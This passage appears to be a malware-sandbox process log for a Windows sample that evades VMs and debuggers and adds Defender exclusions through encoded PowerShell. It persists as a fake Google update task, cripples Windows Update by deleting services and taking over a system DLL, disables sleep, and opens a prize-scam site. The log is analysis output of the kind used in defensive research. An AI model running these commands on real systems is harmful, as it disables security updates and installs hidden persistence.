PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe
PID 5048 wrote to memory of 400	5048	msedge.exe	msedge.exe

C:\Users\Admin\AppData\Local\Temp\2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe
"C:\Users\Admin\AppData\Local\Temp\2d3503d8540e319851a67e55f06ed9e5ba060e821eec6dbc83960a5947ad1310.exe"
1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4696

C:\Users\Admin\AppData\Local\Temp\11.exe
"C:\Users\Admin\AppData\Local\Temp\11.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
PID:312

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\11.exe"
3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5028

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1244

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
- Suspicious use of WriteProcessMemory
PID:4892

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:5092

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4192

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:3928

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:5076

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:1612

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:3292

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:2852

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:1968

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3484

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:4364

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:3840

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:372

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2160

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4552

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1776

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1052

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:2344

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:1996

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
5⤵
PID:3928

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
5⤵
- Modifies security service
PID:3292

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
5⤵
PID:1732

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
5⤵
PID:1528

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
5⤵
PID:3840

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
4⤵
- Suspicious use of WriteProcessMemory
PID:4908

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4928

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:4424

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:1472

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
5⤵
- Suspicious use of AdjustPrivilegeToken
PID:2952

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAG0AdwBtAG0AIwA+ACAAUgBlAGcAaQBzAHQAZQByAC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgAC0AQQBjAHQAaQBvAG4AIAAoAE4AZQB3AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawBBAGMAdABpAG8AbgAgAC0ARQB4AGUAYwB1AHQAZQAgACcAcABvAHcAZQByAHMAaABlAGwAbAAnACAALQBBAHIAZwB1AG0AZQBuAHQAIAAnAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAIgBQAEEAQQBqAEEASABFAEEAWQBnAEEAagBBAEQANABBAEkAQQBCAFQAQQBIAFEAQQBZAFEAQgB5AEEASABRAEEATABRAEIAUQBBAEgASQBBAGIAdwBCAGoAQQBHAFUAQQBjAHcAQgB6AEEAQwBBAEEATABRAEIARwBBAEcAawBBAGIAQQBCAGwAQQBGAEEAQQBZAFEAQgAwAEEARwBnAEEASQBBAEEAbgBBAEUATQBBAE8AZwBCAGMAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAEkAQQBCAEcAQQBHAGsAQQBiAEEAQgBsAEEASABNAEEAWABBAEIASABBAEcAOABBAGIAdwBCAG4AQQBHAHcAQQBaAFEAQgBjAEEARQBNAEEAYQBBAEIAeQBBAEcAOABBAGIAUQBCAGwAQQBGAHcAQQBkAFEAQgB3AEEARwBRAEEAWQBRAEIAMABBAEcAVQBBAGMAZwBBAHUAQQBHAFUAQQBlAEEAQgBsAEEAQwBjAEEASQBBAEEAdABBAEYAWQBBAFoAUQBCAHkAQQBHAEkAQQBJAEEAQgBTAEEASABVAEEAYgBnAEIAQgBBAEgATQBBAEkAQQBBADgAQQBDAE0AQQBiAFEAQgB6AEEAQwBNAEEAUABnAEEAPQAiACcAKQAgADwAIwBvAGoAIwA+ACAALQBUAHIAaQBnAGcAZQByACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAVAByAGkAZwBnAGUAcgAgAC0AQQB0AFMAdABhAHIAdAB1AHAAKQAgADwAIwBuAGkAZwBkACMAPgAgAC0AUwBlAHQAdABpAG4AZwBzACAAKABOAGUAdwAtAFMAYwBoAGUAZAB1AGwAZQBkAFQAYQBzAGsAUwBlAHQAdABpAG4AZwBzAFMAZQB0ACAALQBBAGwAbABvAHcAUwB0AGEAcgB0AEkAZgBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAaQBzAGEAbABsAG8AdwBIAGEAcgBkAFQAZQByAG0AaQBuAGEAdABlACAALQBEAG8AbgB0AFMAdABvAHAASQBmAEcAbwBpAG4AZwBPAG4AQgBhAHQAdABlAHIAaQBlAHMAIAAtAEQAbwBuAHQAUwB0AG8AcABPAG4ASQBkAGwAZQBFAG4AZAAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AVABpAG0AZQBMAGkAbQBpAHQAIAAoAE4AZQB3AC0AVABpAG0AZQBTAHAAYQBuACAALQBEAGEAeQBzACAAMQAwADAAMAApACkAIAA8ACMAcAB5ACMAPgAgAC0AVABhAHMAawBOAGEAbQBlACAAJwBHAG8AbwBnAGwAZQBVAHAAZABhAHQAZQBUAGEAcwBrAE0AYQBjAGgAaQBuAGUAUQBDACcAIAAtAFUAcwBlAHIAIAAnAFMAeQBzAHQAZQBtACcAIAAtAFIAdQBuAEwAZQB2AGUAbAAgACcASABpAGcAaABlAHMAdAAnACAALQBGAG8AcgBjAGUAIAA8ACMAZQB4AHMAIwA+ADsAIABDAG8AcAB5AC0ASQB0AGUAbQAgACcAQwA6AFwAVQBzAGUAcgBzAFwAQQBkAG0AaQBuAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAxADEALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAEYAbwByAGMAZQAgADwAIwB4AGoAZABpACMAPgA7ACAAUwB0AGEAcgB0AC0AUwBjAGgAZQBkAHUAbABlAGQAVABhAHMAawAgADwAIwBsAG8AIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwA7AA=="
4⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://take-realprize.life/?u=lq1pd08&o=hdck0gl
2⤵
- Adds Run key to start application
- Enumerates system info in registry
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:5048

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xf8,0xfc,0x100,0xd8,0x104,0x7ffe86d946f8,0x7ffe86d94708,0x7ffe86d94718
3⤵
PID:4276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2192 /prefetch:2
3⤵
PID:400

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2264 /prefetch:3
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3316

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2684 /prefetch:8
3⤵
PID:3404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3556 /prefetch:1
3⤵
PID:2284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:1
3⤵
PID:1224

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5516 /prefetch:8
3⤵
PID:3924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5304 /prefetch:1
3⤵
PID:2788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5668 /prefetch:1
3⤵
PID:3880

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5644 /prefetch:1
3⤵
PID:3980

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=5756 /prefetch:8
3⤵
PID:4728

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
3⤵
PID:4048

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --configure-user-settings --verbose-logging --system-level --msedge --force-configure-user-settings
3⤵
- Drops file in Program Files directory
PID:316

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\MsEdgeCrashpad --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\Installer\setup.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x228,0x22c,0x230,0x1fc,0x200,0x7ff62dad5460,0x7ff62dad5470,0x7ff62dad5480
4⤵
PID:220

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6292 /prefetch:8
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:516

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5908 /prefetch:8
3⤵
PID:4688

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3252 /prefetch:8
3⤵
PID:4520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,18345619788265661416,9466977470593272406,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6360 /prefetch:2
3⤵
PID:1936

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
1⤵
PID:4920

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -EncodedCommand "PAAjAHEAYgAjAD4AIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAAnAEMAOgBcAFAAcgBvAGcAcgBhAG0AIABGAGkAbABlAHMAXABHAG8AbwBnAGwAZQBcAEMAaAByAG8AbQBlAFwAdQBwAGQAYQB0AGUAcgAuAGUAeABlACcAIAAtAFYAZQByAGIAIABSAHUAbgBBAHMAIAA8ACMAbQBzACMAPgA="
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:3144

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
2⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2012

C:\Windows\System32\conhost.exe
"C:\Windows\System32\conhost.exe" "C:\Program Files\Google\Chrome\updater.exe"
3⤵
- Drops file in Drivers directory
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:792

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHAAYQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGEAZABqAHoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAdwBzACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHIAeQAjAD4A"
4⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
PID:2064

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:428

C:\Windows\system32\sc.exe
sc stop UsoSvc
5⤵
- Launches sc.exe
PID:5000

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
5⤵
- Launches sc.exe
PID:4108

C:\Windows\system32\sc.exe
sc stop wuauserv
5⤵
- Launches sc.exe
PID:2224

C:\Windows\system32\sc.exe
sc stop bits
5⤵
- Launches sc.exe
PID:4852

C:\Windows\system32\sc.exe
sc stop dosvc
5⤵
- Launches sc.exe
PID:3140

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
5⤵
- Modifies registry key
PID:4676

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
5⤵
- Modifies registry key
PID:1860

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
5⤵
- Modifies registry key
PID:4364

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
5⤵
- Modifies registry key
PID:4920

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
5⤵
- Modifies registry key
PID:2192

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2336

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
5⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:1040

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:1472

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:4168

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:3584

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
5⤵
- Modifies registry key
PID:2188

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
5⤵
PID:5108

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
5⤵
PID:4072

C:\Windows\system32\schtasks.exe
